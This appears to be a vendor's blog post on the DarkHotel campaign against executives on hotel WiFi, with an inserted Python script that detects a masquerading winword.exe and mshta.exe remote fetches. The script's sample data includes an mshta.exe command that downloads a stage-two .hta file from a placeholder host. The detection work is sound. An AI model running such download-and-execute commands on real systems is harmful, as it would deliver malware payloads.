Saguaro Hotspot

Dark Hotel Is No Joke

Social WiFi Adds Security

August 8, 2017

Sophisticated Hackers Target Luxury Hotels. Again.

"State-Sponsored" Is Suspected

Active for over a decade, "Dark Hotel" is once again targeting business travelers in luxury hotels through their WiFi. And no one knows, as yet, whether these are software exploits accomplished remotely or if hotel staff & vendors include infiltrators physically accessing hardware.

Their tactics are considered evolutionary, combining phishing/social engineering and one or more Trojans. The only thing clear - and then, only generally - is their targets: CEOs, upper-level corporate officials, and research and development personnel.

The phishing/social engineering part might begin with "carefully crafted phishing email targeted to one person" according to a BitDefender senior analyst.

Craftsmen they are, blending dark arts with science.

An interesting and convincing email. With an email list, perhaps, of contacts in Pyongyang (North Korea). Phishing. Using social engineering arts to deliver a self-extracting archive like winword.exe, which opens a Trojan download once executed. Stage 2 has the malware running a legitimate Microsoft HTML Application host to download the second part, compromising the target.

But the deliveries are in stages, with the first hiding malicious code and strings inside legitimate library code and statically linking the two. This is where "evolutionary" appears. "Malware that updates." The multi-stage Trojan download keeps up with improvements in victims' defenses.
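For defenders, the chain described above (a file named winword.exe that then runs the HTML Application host, mshta.exe, to download the next stage) leaves a recognizable process trail. The following is an added example, not code from the original article or any vendor: a small triage function over process-creation events. The event field names, file paths and URL are constructed assumptions for illustration.

```python
import re
from pathlib import PureWindowsPath

# Assumption: default Office install roots; adjust to the managed image in use.
TRUSTED_ROOTS = ("c:\\program files\\microsoft office\\",
                 "c:\\program files (x86)\\microsoft office\\")
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def basename(path):
    return PureWindowsPath(path).name.lower()

def is_masquerading_office(image):
    """True when a binary is named winword.exe but runs from outside Office's install roots."""
    return basename(image) == "winword.exe" and not image.lower().startswith(TRUSTED_ROOTS)

def is_mshta_fetching_remote(image, cmdline):
    """True when mshta.exe is launched with an http(s) URL on its command line."""
    return basename(image) == "mshta.exe" and bool(URL_RE.search(cmdline))

def triage(events):
    """Return (pid, reason) findings, linking mshta.exe to a masquerading parent if present."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if is_masquerading_office(e["image"]):
            findings.append((e["pid"], "winword.exe outside Office directory"))
        if is_mshta_fetching_remote(e["image"], e["cmdline"]):
            parent = by_pid.get(e["ppid"])
            if parent and is_masquerading_office(parent["image"]):
                findings.append((e["pid"], "mshta.exe remote fetch spawned by masquerading winword.exe"))
            else:
                findings.append((e["pid"], "mshta.exe invoked with remote URL"))
    return findings

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Users\alice\AppData\Local\Temp\winword.exe", "cmdline": "winword.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe http://stage2.example.invalid/a.hta"},
    {"pid": 400, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "cmdline": "WINWORD.EXE report.docx"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe", "cmdline": r"mshta.exe C:\Tools\help.hta"},
]

if __name__ == "__main__":
    for pid, reason in triage(SAMPLE_EVENTS):
        print(pid, reason)
```

The genuine Word process (pid 400) and the local-file mshta.exe launch (pid 500) produce no findings; only the temp-directory winword.exe and its mshta.exe child are flagged.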

According to ZDNet, the "single target" nature of the phish points toward government and political targets. New tactics include new malware (known as Inexsmar) to attack political targets. Similarities in "payloads" are how the connection between DarkHotel and Inexsmar was made. It's espionage.

It's a tough world. Even malware has to be competitive.

"Competitive" means Dark Hotel "never goes after the same target twice; they perform operations with surgical precision, getting all the valuable data they can from the first contact, deleting traces of their work and melting into the background to await the next high profile individual" as a security team at Kaspersky put it.

The targets mentioned above were from the financial industry, pharmaceuticals and technology companies, as well as the military, police and "contractors". Once they connect to compromised hotel WiFi, they're tricked into downloading and installing what they think is an update for Google Toolbar, Adobe Flash or Windows Messenger, when it's actually a backdoor masquerading as legitimate.

At that point, the backdoor can download keyloggers, steal passwords by recording keystrokes and obtain sensitive corporate information. The attackers delete their own tools, go back into hiding, and lurk while waiting for the next target.

Diabolical. Genius. And definitely NOT CARTOON CHARACTERS.

Some say "You can't fix stupid." But some of the smartest people can be fooled by well-crafted phishing and social engineering. Every day we hear about another "exploit", and advice to "Get the latest updates NOW". It can happen even on a wired connection. But Social WiFi can improve your odds when hotels, restaurants, and other businesses take advantage of it. It also lets business owners "Know Customers Like Family". Even local small businesses can afford the additional security. We made sure of that.

